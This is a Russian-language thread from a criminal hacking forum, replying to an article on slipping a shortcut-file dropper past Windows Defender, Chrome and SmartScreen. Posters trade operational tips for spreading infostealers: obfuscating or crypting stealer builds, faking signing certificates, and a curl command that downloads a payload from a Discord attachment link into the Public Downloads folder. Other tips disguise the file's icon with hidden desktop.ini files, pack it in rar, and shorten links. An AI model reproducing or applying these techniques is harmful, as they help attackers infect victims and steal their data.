• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Не плати за крипт или гайд по обходу Виндефа, Хромалерта и Смартскрина For Free + Ink Dropper

Про темиду я сказал чисто из уважения к создателям стилеров, друг, ибо переписывать стаб каждые 2 недели из-за челов, которым лень обфусцировать билд - не особо благодарное дело. Именно поэтому тот же редлайн запрещает лить билд в чистом виде.
обфускация не какой роли не сыграет в анализе антивируса разве что немного собьёт статичиский детект, в динамике по проверяется совершенно по другому, ровным счётом большой роли, и не сыграют протекторы в виде темиды, энигмы, вмп, и чем там ещё школьники пакуют свои "стилаки"

по поводу "запрещает лить" вообще идеотизм зачем тогда вообще по выпускать в продажу на массу

Но .scr это бред конечно, только добавить детекта, по части .msi было пару лет назад все.

Также лепили fake серт и в бой Посмотреть вложение 37078

Проще всего это делать так и.т.д

Не мог бы дать доступ к твоему форуму? Интересно стало почитать статьи. Хотя бы на время =)

Не мог бы дать доступ к твоему форуму? Интересно стало почитать статьи. Хотя бы на время =)
Сканировать на вт архивы это конечно нужно быть гением 🤣

Единственное что хотелось бы дополнить, вместо имени пользователя в пути, нужно ставить константу
cd C:\Users\Public\Downloads
У человека может пользователь называться не Public, то есть например на моём пк твоя штука не сработает, путь должен быть такой:
cd C:\Users\%USERNAME%\Downloads
Тогда работать будет на любом пк
curl -o 1.txt https://cdn.discordapp.com/attachments/922584606400741378/924391503042871297/123.txt - Эта команда отвечает за скачивание самого файла ( не стал сокращать, но вам советую) Аргумент -о отвечает за то, под каким именем сохранится файл, который будет скачан по ссылке, далее идёт сама ссылка на прямое скачивание файла.
Вот эта команда у меня не работает
1657268363918.png

Скорее всего нужно открывать через терминал какое то приложение, а потом уже открывать, хз) У тебя по крайней мере написано что она работает напрямую из терминала

Единственное что хотелось бы дополнить, вместо имени пользователя в пути, нужно ставить константу

У человека может пользователь называться не Public, то есть например на моём пк твоя штука не сработает, путь должен быть такой:
cd C:\Users\%USERNAME%\Downloads
Тогда работать будет на любом пк

Вот эта команда у меня не работает
Посмотреть вложение 39033
Скорее всего нужно открывать через терминал какое то приложение, а потом уже открывать, хз) У тебя по крайней мере написано что она работает напрямую из терминала
Не совсем так, дружище. Помимо папок с локальными учётками есть ещё папка Общие, она же Public.
А курл встроено во все вин, начиная от 10 версии )

Не совсем так, дружище. Помимо папок с локальными учётками есть ещё папка Общие, она же Public.
А курл встроено во все вин, начиная от 10 версии )
Ну так загрузки находятся не в общих, а в загрузках конкретного юзера, если мне не изменяет память.
Про curl спасибо, буду знать)

Ну так загрузки находятся не в общих, а в загрузках конкретного юзера, если мне не изменяет память.
Там так же есть папка "общие загрузки" Если это она конечно)

просто попробуй найти у себя на машине эту папку, друг
C:\Users\Public\Downloads

После того как пользователь скачает такой файл - иконка у него не отобразится. Если мне не изменяет память, иконку нужно прописать в файле desktop.ini:
Код:
[.ShellClassInfo]
IconResource=filename.ico,0
все это складывается в одну папку и затем для desktop.ini и filename.ico нужно проставить атрибуты «скрытый», через attrib или свойства файла.
Затем папка пакуется в rar и тд.
Как это сделать? Ни гугл, ни ютуб не помогли, Resource Hack тоже (((

На всякий случай привожу список встроенных библиотек Windows 10, где хранятся основные иконки системы (все находятся в C:\Windows\System32)
  • shell32.dll (выбран по умолчанию при смене значка).
  • imageres.dll
  • ddores.dll
Рекомендую использовать стоковые библиотеки вин, бро. Там есть всё, что нужно

Пожалуйста, обратите внимание, что пользователь заблокирован
Красиво? Ещё неочень, дальше мы идём на лучший сократитель ссылок gg.gg
Ссылки с gg.gg можно снести

Пожалуйста, обратите внимание, что пользователь заблокирован
да это все как пример показали, как основы, дальше же все своё юзать будут, а не с мануала :)
Ну есть друрочки что будут и так предупреждаю о приколах

очень годная инфа, сам заинтересовался данными фишками, только почему то curl не хочет работать :( хотя тест производится на вин серв 2016
на WS курла по умолчанию нет, насколько я знаю, бро. Он совершенно точно есть на w10 , так что с этим проблем быть не должно. Если не хочешь стилировать свой собственный пк, то вместо ехе просто пихни туда любой текстовик или напиши мне в лс\тг за примером

на WS курла по умолчанию нет, насколько я знаю, бро. Он совершенно точно есть на w10 , так что с этим проблем быть не должно. Если не хочешь стилировать свой собственный пк, то вместо ехе просто пихни туда любой текстовик или напиши мне в лс\тг за примером

да, вчера на вин10 протестил - ворк, как я понял на вин серв такая особенность с курлом :)

да, вчера на вин10 протестил - ворк, как я понял на вин серв такая особенность с курлом :)
не только на ws, он есть на 8 (вроде) и 10 (точно). На 11 хз, не тестил)

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх